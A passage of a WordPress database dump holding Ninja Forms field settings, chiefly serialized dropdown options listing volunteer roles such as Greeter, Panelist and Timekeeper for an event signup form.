Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:3:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Food Services\";s:5:\"value\";s:13:\"Food Services\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:7:\"Greeter\";s:5:\"value\";s:7:\"Greeter\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:4:\"Host\";s:5:\"value\";s:4:\"Host\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(8997,277,'value','','value',''),(8998,278,'editActive','','editActive',''),(8999,278,'field_label','Email','field_label','Email'),(7648,266,'key','listmultiselect_232','key','listmultiselect_232'),(7649,266,'container_class',' one-third','container_class',' one-third'),(7650,266,'parent_id','24','parent_id','24'),(7651,267,'objectType','Field','objectType','Field'),(7652,267,'objectDomain','fields','objectDomain','fields'),(7653,267,'editActive','','editActive',''),(7654,267,'order','15','order','15'),(7655,267,'type','listmultiselect','type','listmultiselect'),(7656,267,'label','ECK Worship Service','label','ECK Worship Service'),(7657,267,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(7658,267,'label_pos','above','label_pos','above'),(7659,267,'list_type','multi','list_type','multi'),(7660,267,'multi_size','12','multi_size','12'),(7661,267,'list_show_value','1','list_show_value','1'),(7662,267,'list','a:0:{}','list','a:0:{}'),(7663,267,'user_info_field_group','','user_info_field_group',''),(7664,267,'calc_auto_include','0','calc_auto_include','0'),(7665,267,'user_state','0','user_state','0'),(7666,267,'num_sort','0','num_sort','0'),(7667,267,'admin_label','','admin_label',''),(7668,267,'show_help','0','show_help','0'),(7669,267,'help_text','','help_text',''),(7670,267,'show_desc','0','show_desc','0'),(7671,267,'desc_pos','none','desc_pos','none'),(7672,267,'desc_text','','desc_text',''),(7673,267,'element_class','','element_class',''),(7674,267,'required','0','required','0'),(7675,267,'options','a:13:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:18:\"Attendee (support)\";s:5:\"value\";s:18:\"Attendee (support)\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:20:\"Audio Visual Support\";s:5:\"value\";s:20:\"Audio Visual Support\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:28:\"Clean Up Of Food After Event\";s:5:\"value\";s:28:\"Clean Up Of Food After Event\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:25:\"Creative Arts Coordinator\";s:5:\"value\";s:25:\"Creative Arts Coordinator\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:15:\"Creative Artist\";s:5:\"value\";s:15:\"Creative Artist\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:33:\"Food Services For After the Event\";s:5:\"value\";s:33:\"Food Services For After the Event\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Greeter\";s:5:\"value\";s:7:\"Greeter\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Panelist\";s:5:\"value\";s:8:\"Panelist\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:8;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:15:\"Panel Moderator\";s:5:\"value\";s:15:\"Panel Moderator\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:9;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:28:\"Prelude Music Before Service\";s:5:\"value\";s:28:\"Prelude Music Before Service\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:10;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Speaker\";s:5:\"value\";s:7:\"Speaker\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:11;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Timekeeper\";s:5:\"value\";s:10:\"Timekeeper\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons 